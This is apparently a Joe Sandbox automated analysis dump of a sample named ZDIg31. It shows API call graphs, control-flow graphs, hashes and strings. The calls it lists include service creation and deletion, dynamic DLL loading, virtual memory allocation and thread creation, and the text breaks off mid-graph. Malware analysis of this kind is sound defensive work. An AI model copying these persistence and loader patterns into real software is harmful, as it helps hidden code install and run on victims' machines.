MultiByteToWideChar 14064->14066 14065->13996 14067 140009ec8 14066->14067 14068 140009ed9 14066->14068 14067->13996 14069 140008370 3 API calls 14068->14069 14070 140009eeb 14069->14070 14071 140009f32 14070->14071 14072 140009ef3 MultiByteToWideChar 14070->14072 14071->13996 14073 140009f13 14072->14073 14074 140009f2a 14072->14074 14073->13996 14185 140008de0 14074->14185 14077 140009c52 GetEnvironmentStringsW 14076->14077 14078 140009c86 14076->14078 14079 140009c6c GetLastError 14077->14079 14086 140009c60 14077->14086 14080 140009c91 GetEnvironmentStringsW 14078->14080 14081 140009c77 14078->14081 14079->14078 14079->14081 14083 140005c67 14080->14083 14080->14086 14082 140009d09 GetEnvironmentStrings 14081->14082 14081->14083 14082->14083 14084 140009d17 14082->14084 14102 1400099c0 GetModuleFileNameW 14083->14102 14085 140009d58 14084->14085 14088 140009d20 MultiByteToWideChar 14084->14088 14089 140008370 3 API calls 14085->14089 14190 140008300 14086->14190 14088->14083 14088->14084 14091 140009d68 14089->14091 14094 140009d7d 14091->14094 14095 140009d70 FreeEnvironmentStringsA 14091->14095 14092 140009ce1 __SehTransFilter 14096 140009cef FreeEnvironmentStringsW 14092->14096 14093 140009cd1 FreeEnvironmentStringsW 14093->14083 14097 140009de5 FreeEnvironmentStringsA 14094->14097 14098 140009d90 MultiByteToWideChar 14094->14098 14095->14083 14096->14083 14097->14083 14098->14094 14099 140009e0e 14098->14099 14100 140008de0 _lock 2 API calls 14099->14100 14101 140009e16 FreeEnvironmentStringsA 14100->14101 14101->14083 14103 140009a03 14102->14103 14104 140008300 _lock 17 API calls 14103->14104 14105 140009bca 14103->14105 14104->14105 14105->14000 14107 1400096b2 14106->14107 14108 1400096a8 14106->14108 14109 140008370 3 API calls 14107->14109 14108->14004 14113 1400096fa 14109->14113 14110 140009709 14110->14004 14111 1400097a5 14112 140008de0 _lock 2 API calls 14111->14112 14117 1400097b4 14112->14117 14113->14110 14113->14111 14114 140008370 3 API calls 14113->14114 14115 1400097e5 14113->14115 14114->14113 14116 140008de0 _lock 2 API calls 14115->14116 14116->14117 14117->14004 14120 140008666 14118->14120 14121 1400086bf 14120->14121 14206 140005380 14120->14206 14121->14008 14123 140001565 14122->14123 14124 140001569 14123->14124 14127 14000157e 14123->14127 14244 140001430 GetModuleFileNameW OpenSCManagerW 14124->14244 14128 140001595 OpenSCManagerW 14127->14128 14129 14000164f 14127->14129 14130 1400015b2 GetLastError 14128->14130 14131 1400015cf OpenServiceW 14128->14131 14132 140001654 14129->14132 14133 140001669 StartServiceCtrlDispatcherW 14129->14133 14130->13975 14134 140001611 DeleteService 14131->14134 14135 1400015e9 GetLastError CloseServiceHandle 14131->14135 14253 1400011f0 14132->14253 14133->13975 14137 140001626 CloseServiceHandle CloseServiceHandle 14134->14137 14138 14000161e GetLastError 14134->14138 14135->13975 14137->13975 14138->14137 14141 14000f01e __SehTransFilter 14140->14141 14142 14000f03b LoadLibraryA 14141->14142 14145 14000f125 _lock 14141->14145 14143 14000f054 GetProcAddress 14142->14143 14144 1400094c9 14142->14144 14143->14144 14146 14000f06d _lock 14143->14146 14144->13971 14159 14000f165 14145->14159 14163 1400073e0 LdrLoadDll 14145->14163 14150 14000f075 GetProcAddress 14146->14150 14148 1400073e0 _lock LdrLoadDll 14148->14144 14149 1400073e0 _lock LdrLoadDll 14155 14000f1e9 14149->14155 14152 140007220 _lock 14150->14152 14154 14000f094 GetProcAddress 14152->14154 14153 1400073e0 _lock LdrLoadDll 14153->14159 14157 14000f0b3 _lock 14154->14157 14156 1400073e0 _lock LdrLoadDll 14155->14156 14161 14000f1a3 _lock 14155->14161 14156->14161 14157->14145 14158 14000f0e9 GetProcAddress 14157->14158 14160 14000f101 _lock 14158->14160 14159->14149 14159->14161 14160->14145 14162 14000f10d GetProcAddress 14160->14162 14161->14148 14162->14145 14164 140007333 14163->14164 14164->14163 14165 140007403 14164->14165 14165->14153 14167 1400083a0 14166->14167 14169 1400083e0 14167->14169 14170 1400083be Sleep 14167->14170 14177 14000e850 14167->14177 14169->14047 14170->14167 14170->14169 14172 1400073e0 _lock LdrLoadDll 14171->14172 14173 14000edec _lock 14172->14173 14174 14000ee26 GetModuleHandleA 14173->14174 14175 14000ee1d _lock 14173->14175 14174->14175 14176 14000ee38 GetProcAddress 14174->14176 14175->14044 14176->14175 14178 14000e865 14177->14178 14179 14000e8be HeapAlloc 14178->14179 14181 14000e876 sprintf_s 14178->14181 14182 1400090b0 14178->14182 14179->14178 14179->14181 14181->14167 14183 1400073e0 _lock LdrLoadDll 14182->14183 14184 1400090c5 14183->14184 14184->14178 14186 140008de9 HeapFree 14185->14186 14187 140008e19 _lock 14185->14187 14186->14187 14188 140008dff sprintf_s 14186->14188 14187->14071 14189 140008e09 GetLastError 14188->14189 14189->14187 14191 140008320 14190->14191 14193 140008358 14191->14193 14194 140008338 Sleep 14191->14194 14195 1400090f0 14191->14195 14193->14092 14193->14093 14194->14191 14194->14193 14196 14000919e 14195->14196 14201 140009103 14195->14201 14197 1400090b0 _lock LdrLoadDll 14196->14197 14199 1400091a3 sprintf_s 14197->14199 14198 14000914c HeapAlloc 14198->14201 14202 140009173 sprintf_s 14198->14202 14199->14191 14200 140009540 _lock 12 API calls 14200->14201 14201->14198 14201->14200 14201->14202 14203 140009300 _lock 10 API calls 14201->14203 14204 1400090b0 _lock LdrLoadDll 14201->14204 14205 140008510 _lock 3 API calls 14201->14205 14202->14191 14203->14201 14204->14201 14205->14201 14209 140005250 14206->14209 14208 140005389 14208->14121 14210 140005271 14209->14210 14211 1400073e0 _lock LdrLoadDll 14210->14211 14212 14000527e 14211->14212 14213 1400073e0 _lock LdrLoadDll 14212->14213 14214 14000528d 14213->14214 14220 1400052f0 _lock 14214->14220 14221 140008490 14214->14221 14216 1400052b5 14217 1400052d9 14216->14217 14216->14220 14224 140008400 14216->14224 14219 140008400 7 API calls 14217->14219 14217->14220 14219->14220 14220->14208 14222 1400084c5 HeapSize 14221->14222 14223 140008499 sprintf_s 14221->14223 14223->14216 14226 140008430 14224->14226 14227 140008472 14226->14227 14228 140008450 Sleep 14226->14228 14229 14000e920 14226->14229 14227->14217 14228->14226 14228->14227 14230 14000e935 14229->14230 14231 14000e94c 14230->14231 14242 14000e95e 14230->14242 14232 140008de0 _lock 2 API calls 14231->14232 14234 14000e951 14232->14234 14233 14000e9b1 14236 1400090b0 _lock LdrLoadDll 14233->14236 14234->14226 14235 14000e973 HeapReAlloc 14240 14000e9b9 _lock sprintf_s 14235->14240 14235->14242 14236->14240 14237 14000e9f4 sprintf_s 14239 14000e9f9 GetLastError 14237->14239 14238 1400090b0 _lock LdrLoadDll 14238->14242 14239->14240 14240->14226 14241 14000e9db sprintf_s 14243 14000e9e0 GetLastError 14241->14243 14242->14233 14242->14235 14242->14237 14242->14238 14242->14241 14243->14240 14245 140001482 CreateServiceW 14244->14245 14246 14000147a GetLastError 14244->14246 14248 1400014ea GetLastError 14245->14248 14249 1400014df CloseServiceHandle 14245->14249 14247 1400014fd 14246->14247 14259 140004f30 14247->14259 14250 1400014f2 CloseServiceHandle 14248->14250 14249->14250 14250->14247 14252 14000150d 14252->13975 14254 1400011fa 14253->14254 14268 1400051d0 14254->14268 14257 140004f30 sprintf_s NtAllocateVirtualMemory 14258 140001262 14257->14258 14258->13975 14261 140004f39 _CreateFrameInfo 14259->14261 14260 140004f44 14260->14252 14261->14260 14264 140006c95 14261->14264 14263 14000660e sprintf_s 14263->14252 14265 140006d7b 14264->14265 14267 140006d9d 14264->14267 14266 140006f95 NtAllocateVirtualMemory 14265->14266 14265->14267 14266->14267 14267->14263 14271 140008270 14268->14271 14270 140001238 MessageBoxW 14270->14257 14272 14000827e 14271->14272 14273 1400082ac sprintf_s 14271->14273 14272->14273 14275 140008120 14272->14275 14273->14270 14276 14000816a 14275->14276 14280 14000813b sprintf_s 14275->14280 14278 1400081d7 14276->14278 14276->14280 14281 140007f50 14276->14281 14279 140007f50 sprintf_s 54 API calls 14278->14279 14278->14280 14279->14280 14280->14273 14282 140007f69 sprintf_s 14281->14282 14283 140007f74 sprintf_s 14282->14283 14284 14000801d 14282->14284 14294 14000cd50 14282->14294 14283->14278 14285 1400080d5 14284->14285 14286 14000802f 14284->14286 14287 14000cc00 sprintf_s 54 API calls 14285->14287 14288 14000804c 14286->14288 14290 140008081 14286->14290 14292 140008056 14287->14292 14297 14000cc00 14288->14297 14290->14292 14305 14000c2a0 14290->14305 14292->14278 14295 140008300 _lock 17 API calls 14294->14295 14296 14000cd6a 14295->14296 14296->14284 14298 14000cc3f 14297->14298 14304 14000cc23 sprintf_s 14297->14304 14298->14304 14313 14000fc50 14298->14313 14302 14000ccc5 sprintf_s 14358 14000fd20 LeaveCriticalSection 14302->14358 14304->14292 14306 14000c2e0 14305->14306 14309 14000c2c3 sprintf_s 14305->14309 14307 14000fc50 sprintf_s 25 API calls 14306->14307 14306->14309 14308 14000c34e 14307->14308 14310 14000c367 sprintf_s 14308->14310 14311 14000c1f0 sprintf_s 2 API calls 14308->14311 14309->14292 14392 14000fd20 LeaveCriticalSection 14310->14392 14311->14310 14314 14000fc96 14313->14314 14315 14000fccb 14313->14315 14359 14000b400 14314->14359 14317 14000ccac 14315->14317 14318 14000fccf EnterCriticalSection 14315->14318 14317->14302 14323 14000c3f0 14317->14323 14318->14317 14326 14000c42e 14323->14326 14342 14000c427 sprintf_s 14323->14342 14324 140004f30 sprintf_s NtAllocateVirtualMemory 14325 14000cbe6 14324->14325 14325->14302 14329 14000c4fb sprintf_s _CreateFrameInfo 14326->14329 14326->14342 14386 14000c1f0 14326->14386 14328 14000c841 14330 14000c86a 14328->14330 14331 14000cb20 WriteFile 14328->14331 14329->14328 14333 14000c526 GetConsoleMode 14329->14333 14332 14000c936 14330->14332 14338 14000c876 14330->14338 14334 14000cb53 GetLastError 14331->14334 14331->14342 14340 14000c940 14332->14340 14348 14000ca02 14332->14348 14333->14328 14335 14000c557 14333->14335 14334->14342 14335->14328 14336 14000c564 GetConsoleCP 14335->14336 14336->14342 14352 14000c581 sprintf_s 14336->14352 14337 14000c8c5 WriteFile 14337->14338 14339 14000c928 GetLastError 14337->14339 14338->14337 14338->14342 14339->14342 14341 14000c991 WriteFile 14340->14341 14340->14342 14341->14340 14345 14000c9f4 GetLastError 14341->14345 14342->14324 14343 14000ca57 WideCharToMultiByte 14344 14000cb15 GetLastError 14343->14344 14343->14348 14344->14342 14345->14342 14346 14000cab0 WriteFile 14347 14000caf6 GetLastError 14346->14347 14346->14348 14347->14342 14347->14348 14348->14342 14348->14343 14348->14346 14349 14000c649 WideCharToMultiByte 14349->14342 14351 14000c68c WriteFile 14349->14351 14350 14000fd50 7 API calls sprintf_s 14350->14352 14351->14352 14353 14000c80d GetLastError 14351->14353 14352->14342 14352->14349 14352->14350 14354 14000c829 GetLastError 14352->14354 14355 14000c6e2 WriteFile 14352->14355 14357 14000c81b GetLastError 14352->14357 14353->14342 14354->14342 14355->14352 14356 14000c7ff GetLastError 14355->14356 14356->14342 14357->14342 14360 14000b41e 14359->14360 14361 14000b42f EnterCriticalSection 14359->14361 14365 14000b2f0 14360->14365 14363 14000b423 14363->14361 14364 1400084e0 _lock 12 API calls 14363->14364 14364->14361 14366 14000b317 14365->14366 14367 14000b32e 14365->14367 14368 140009540 _lock 12 API calls 14366->14368 14369 140008300 _lock 17 API calls 14367->14369 14373 14000b342 sprintf_s 14367->14373 14370 14000b31c 14368->14370 14371 14000b350 14369->14371 14372 140009300 _lock 10 API calls 14370->14372 14371->14373 14375 14000b400 _lock 22 API calls 14371->14375 14374 14000b324 14372->14374 14373->14363 14376 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14374->14376 14377 14000b371 14375->14377 14376->14367 14378 14000b3a7 14377->14378 14379 14000b379 14377->14379 14380 140008de0 _lock HeapFree GetLastError 14378->14380 14381 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14379->14381 14385 14000b392 sprintf_s 14380->14385 14382 14000b386 14381->14382 14384 140008de0 _lock HeapFree GetLastError 14382->14384 14382->14385 14383 14000b3b0 LeaveCriticalSection 14383->14373 14384->14385 14385->14383 14387 14000c20c sprintf_s 14386->14387 14388 14000c22c SetFilePointer 14387->14388 14390 14000c212 sprintf_s 14387->14390 14389 14000c24a GetLastError 14388->14389 14391 14000c254 sprintf_s 14388->14391 14389->14391 14390->14329 14391->14329 13958 140006c95 13959 140006d7b 13958->13959 13961 140006d9d 13958->13961 13960 140006f95 NtAllocateVirtualMemory 13959->13960 13959->13961 13960->13961 16867 7ffe9b9011b0 16875 7ffe9b901209 16867->16875 16868 7ffe9b901b90 51 API calls 16885 7ffe9b901300 BuildCatchObjectHelperInternal 16868->16885 16869 7ffe9b9014f0 16895 7ffe9b901a40 16869->16895 16870 7ffe9b901b70 _log10_special 8 API calls 16874 7ffe9b9014d3 16870->16874 16872 7ffe9b9012c7 16877 7ffe9b901b90 51 API calls 16872->16877 16873 7ffe9b90129e 16876 7ffe9b9014f6 16873->16876 16886 7ffe9b901b90 16873->16886 16875->16869 16875->16872 16875->16873 16880 7ffe9b9012b9 BuildCatchObjectHelperInternal 16875->16880 16875->16885 16898 7ffe9b901110 16876->16898 16877->16880 16880->16868 16883 7ffe9b9014eb 16884 7ffe9b9079cc _invalid_parameter_noinfo_noreturn 47 API calls 16883->16884 16884->16869 16885->16870 16887 7ffe9b901b9b 16886->16887 16888 7ffe9b9012b0 16887->16888 16889 7ffe9b907a4c _invalid_parameter_noinfo_noreturn 2 API calls 16887->16889 16890 7ffe9b901bba 16887->16890 16888->16880 16888->16883 16889->16887 16891 7ffe9b901bc5 16890->16891 16904 7ffe9b9021f0 16890->16904 16893 7ffe9b901110 Concurrency::cancel_current_task 51 API calls 16891->16893 16894 7ffe9b901bcb 16893->16894 16908 7ffe9b901b34 16895->16908 16899 7ffe9b90111e Concurrency::cancel_current_task 16898->16899 16900 7ffe9b903990 std::_Xinvalid_argument 2 API calls 16899->16900 16901 7ffe9b90112f 16900->16901 16902 7ffe9b90379c __std_exception_copy 49 API calls 16901->16902 16903 7ffe9b901159 16902->16903 16905 7ffe9b9021fe Concurrency::cancel_current_task 16904->16905 16906 7ffe9b903990 std::_Xinvalid_argument 2 API calls 16905->16906 16907 7ffe9b90220f 16906->16907 16913 7ffe9b901ab0 16908->16913 16911 7ffe9b903990 std::_Xinvalid_argument 2 API calls 16912 7ffe9b901b56 16911->16912 16914 7ffe9b90379c __std_exception_copy 49 API calls 16913->16914 16915 7ffe9b901ae4 16914->16915 16915->16911 14393 1400054e0 14394 14000552c 14393->14394 14398 140005506 sprintf_s 14393->14398 14406 1400074d0 14394->14406 14397 140008370 3 API calls 14400 140005545 _CreateFrameInfo 14397->14400 14399 1400055b8 14401 140008de0 _lock 2 API calls 14399->14401 14400->14399 14410 1400074f0 14400->14410 14402 1400055c0 sprintf_s 14401->14402 14402->14398 14405 1400055b0 GetLastError 14405->14399 14408 140007333 14406->14408 14407 140005536 14407->14397 14408->14407 14409 1400073e0 LdrLoadDll 14408->14409 14409->14408 14413 140007333 14410->14413 14411 140005561 CreateThread 14411->14402 14411->14405 14412 1400073e0 LdrLoadDll 14412->14413 14413->14411 14413->14412

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 159 140006fdc-140007020 155->159 156->132 160 140006f37-140006f7a 157->160 158->160 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 165 140007039-140007058 161->165 166 14000705a-140007062 161->166 162->151 163->162 165->161 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@
                                      • API String ID: 0-149943524
                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: File$CreateReadmalloc
                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                      • API String ID: 3950102678-3381721293
                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25 7ffe9b901c00-7ffe9b901c06 26 7ffe9b901c08-7ffe9b901c0b 25->26 27 7ffe9b901c41-7ffe9b901c4b 25->27 29 7ffe9b901c0d-7ffe9b901c10 26->29 30 7ffe9b901c35-7ffe9b901c74 call 7ffe9b902470 26->30 28 7ffe9b901d68-7ffe9b901d7d 27->28 33 7ffe9b901d8c-7ffe9b901da6 call 7ffe9b902304 28->33 34 7ffe9b901d7f 28->34 31 7ffe9b901c28 __scrt_dllmain_crt_thread_attach 29->31 32 7ffe9b901c12-7ffe9b901c15 29->32 48 7ffe9b901c7a-7ffe9b901c8f call 7ffe9b902304 30->48 49 7ffe9b901d42 30->49 40 7ffe9b901c2d-7ffe9b901c34 31->40 36 7ffe9b901c17-7ffe9b901c20 32->36 37 7ffe9b901c21-7ffe9b901c26 call 7ffe9b9023b4 32->37 46 7ffe9b901ddb-7ffe9b901e0c call 7ffe9b902630 33->46 47 7ffe9b901da8-7ffe9b901dd9 call 7ffe9b90242c call 7ffe9b9022d4 call 7ffe9b9027b4 call 7ffe9b9025d0 call 7ffe9b9025f4 call 7ffe9b90245c 33->47 38 7ffe9b901d81-7ffe9b901d8b 34->38 37->40 57 7ffe9b901e1d-7ffe9b901e23 46->57 58 7ffe9b901e0e-7ffe9b901e14 46->58 47->38 60 7ffe9b901d5a-7ffe9b901d67 call 7ffe9b902630 48->60 61 7ffe9b901c95-7ffe9b901ca6 call 7ffe9b902374 48->61 52 7ffe9b901d44-7ffe9b901d59 49->52 64 7ffe9b901e65-7ffe9b901e6d call 7ffe9b901720 57->64 65 7ffe9b901e25-7ffe9b901e2f 57->65 58->57 63 7ffe9b901e16-7ffe9b901e18 58->63 60->28 75 7ffe9b901ca8-7ffe9b901ccc call 7ffe9b902778 call 7ffe9b9022c4 call 7ffe9b9022e8 call 7ffe9b907b10 61->75 76 7ffe9b901cf7-7ffe9b901d01 call 7ffe9b9025d0 61->76 70 7ffe9b901f02-7ffe9b901f0f 63->70 77 7ffe9b901e72-7ffe9b901e7b 64->77 71 7ffe9b901e36-7ffe9b901e3c 65->71 72 7ffe9b901e31-7ffe9b901e34 65->72 78 7ffe9b901e3e-7ffe9b901e44 71->78 72->78 75->76 127 7ffe9b901cce-7ffe9b901cd5 __scrt_dllmain_after_initialize_c 75->127 76->49 98 7ffe9b901d03-7ffe9b901d0f call 7ffe9b902620 76->98 82 7ffe9b901e7d-7ffe9b901e7f 77->82 83 7ffe9b901eb3-7ffe9b901eb5 77->83 86 7ffe9b901e4a-7ffe9b901e5f call 7ffe9b901c00 78->86 87 7ffe9b901ef8-7ffe9b901f00 78->87 82->83 91 7ffe9b901e81-7ffe9b901ea3 call 7ffe9b901720 call 7ffe9b901d68 82->91 93 7ffe9b901ebc-7ffe9b901ed1 call 7ffe9b901c00 83->93 94 7ffe9b901eb7-7ffe9b901eba 83->94 86->64 86->87 87->70 91->83 122 7ffe9b901ea5-7ffe9b901eaa 91->122 93->87 108 7ffe9b901ed3-7ffe9b901edd 93->108 94->87 94->93 115 7ffe9b901d35-7ffe9b901d40 98->115 116 7ffe9b901d11-7ffe9b901d1b call 7ffe9b902538 98->116 113 7ffe9b901ee4-7ffe9b901ef2 108->113 114 7ffe9b901edf-7ffe9b901ee2 108->114 119 7ffe9b901ef4 113->119 114->119 115->52 116->115 126 7ffe9b901d1d-7ffe9b901d2b 116->126 119->87 122->83 126->115 127->76 128 7ffe9b901cd7-7ffe9b901cf4 call 7ffe9b907acc 127->128 128->76
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 190073905-0
                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction ID: 69dc57e234ac2bea3572effde349390e2f3bb7bd4712d6cb960f7c1a5490d5d9
                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction Fuzzy Hash: 6481E3A0E2C26F46F734ABA594412797790AF56B88F044035FA0C477B2DE3CEB459730

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                      • String ID: WordpadFilter.db
                                      • API String ID: 868324331-3647581008
                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction ID: d405c4bdd945e7a0888417fb8cbe66c9482e36bde2108849dbd7cc13d3bb51cf
                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction Fuzzy Hash: B6314B32F25B4589E710DFA1E8402AD73A5EB89788F144636EE8D13B69EF38D691C350

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 196 7ffe9b9011b0-7ffe9b901207 197 7ffe9b90124b-7ffe9b90124e 196->197 198 7ffe9b901209-7ffe9b901222 call 7ffe9b911490 196->198 199 7ffe9b9014b8-7ffe9b9014bf 197->199 200 7ffe9b901254-7ffe9b901280 197->200 210 7ffe9b901224-7ffe9b901227 198->210 211 7ffe9b90123e 198->211 204 7ffe9b9014c3-7ffe9b9014ea call 7ffe9b901b70 199->204 202 7ffe9b9012f6-7ffe9b901335 call 7ffe9b901b90 call 7ffe9b910a50 200->202 203 7ffe9b901282-7ffe9b90128f 200->203 232 7ffe9b901340-7ffe9b9013cb 202->232 207 7ffe9b901295-7ffe9b90129c 203->207 208 7ffe9b9014f1-7ffe9b9014f6 call 7ffe9b901a40 203->208 215 7ffe9b9012c7-7ffe9b9012cf call 7ffe9b901b90 207->215 216 7ffe9b90129e-7ffe9b9012a5 207->216 223 7ffe9b9014f7-7ffe9b9014ff call 7ffe9b901110 208->223 213 7ffe9b901241-7ffe9b901246 210->213 218 7ffe9b901229-7ffe9b90123c call 7ffe9b911490 210->218 211->213 213->197 230 7ffe9b9012d2-7ffe9b9012f1 call 7ffe9b910e10 215->230 222 7ffe9b9012ab-7ffe9b9012b3 call 7ffe9b901b90 216->222 216->223 218->210 218->211 236 7ffe9b9014eb-7ffe9b9014f0 call 7ffe9b9079cc 222->236 237 7ffe9b9012b9-7ffe9b9012c5 222->237 230->202 232->232 235 7ffe9b9013d1-7ffe9b9013da 232->235 239 7ffe9b9013e0-7ffe9b901402 235->239 236->208 237->230 241 7ffe9b901404-7ffe9b90140e 239->241 242 7ffe9b901411-7ffe9b90142c 239->242 241->242 242->239 244 7ffe9b90142e-7ffe9b901436 242->244 245 